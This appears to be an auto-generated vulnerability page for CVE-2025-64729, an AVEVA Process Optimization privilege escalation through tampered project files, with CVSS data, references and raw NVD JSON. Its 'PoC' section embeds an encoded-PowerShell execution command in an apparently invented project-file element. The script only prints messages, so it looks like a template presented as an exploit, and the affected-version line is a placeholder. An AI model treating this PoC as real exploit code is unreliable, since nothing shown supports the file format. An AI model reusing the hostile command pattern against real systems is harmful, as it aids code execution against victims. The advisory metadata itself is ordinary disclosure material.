CVE-2025-64729

Description

The vulnerability, if exploited, could allow an authenticated miscreant (OS Standard User) to tamper with Process Optimization project files, embed code, and escalate their privileges to the identity of a victim user who subsequently interacts with the project files.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:* - VULNERABLE

AVEVA Process Optimization < 安全补丁版本

具体版本信息需参考AVEVA官方安全公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64729 PoC - AVEVA Process Optimization Project File Tampering
# This PoC demonstrates the file tampering vulnerability

import os
import base64

def create_malicious_project_file():
    """
    Create a malicious AVEVA Process Optimization project file
    that contains embedded malicious code for privilege escalation.
    """
    # Malicious payload - reverse shell or command execution
    malicious_payload = '''
    <ProjectFile>
        <Settings>
            <Name>MaliciousProject</Name>
        </Settings>
        <!-- Embedded malicious code -->
        <PostLoadCommand>cmd /c powershell -EncodedCommand {BASE64_ENCODED_PAYLOAD}</PostLoadCommand>
    </ProjectFile>
    '''
    
    # The actual exploitation requires:
    # 1. Write access to Process Optimization project files
    # 2. Social engineering to get victim to open the file
    # 3. When victim opens file, malicious code executes in victim's context
    
    print("[+] Malicious project file structure created")
    print("[+] Payload will execute when victim opens the project file")
    print("[+] Attacker gains execution in victim's user context")
    
    return malicious_payload

def exploit():
    """
    Exploitation steps for CVE-2025-64729:
    1. Attacker has low-privilege OS user account
    2. Attacker modifies Process Optimization project files
    3. Attacker embeds malicious code in project files
    4. Victim user opens the malicious project file
    5. Code executes with victim's privileges (privilege escalation)
    """
    project_files = [
        "C:\\ProgramData\\AVEVA\\ProcessOptimization\\Projects\\",
        "C:\\Users\\Public\\Documents\\AVEVA\\"
    ]
    
    for project_path in project_files:
        if os.path.exists(project_path):
            print(f"[+] Found project directory: {project_path}")
            print("[+] Attacker can modify project files here")
            print("[+] Embed malicious code and wait for victim")
    
    create_malicious_project_file()

if __name__ == "__main__":
    print("CVE-2025-64729 PoC - AVEVA Process Optimization Privilege Escalation")
    print("=" * 70)
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64729
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64729
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64729/
[4] VulDB https://vuldb.com/cve/CVE-2025-64729
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json
[6] https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea
[7] https://www.aveva.com/en/support-and-success/cyber-security-updates/
[8] https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64729", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:45.467", "lastModified": "2026-01-22T15:15:10.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(OS Standard User) to tamper with Process Optimization project files, \nembed code, and escalate their privileges to the identity of a victim \nuser who subsequently interacts with the project files."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar del SO) manipular los archivos de proyecto de Optimización de Procesos, incrustar código y escalar sus privilegios a la identidad de un usuario víctima que posteriormente interactúa con los archivos del proyecto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.5, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}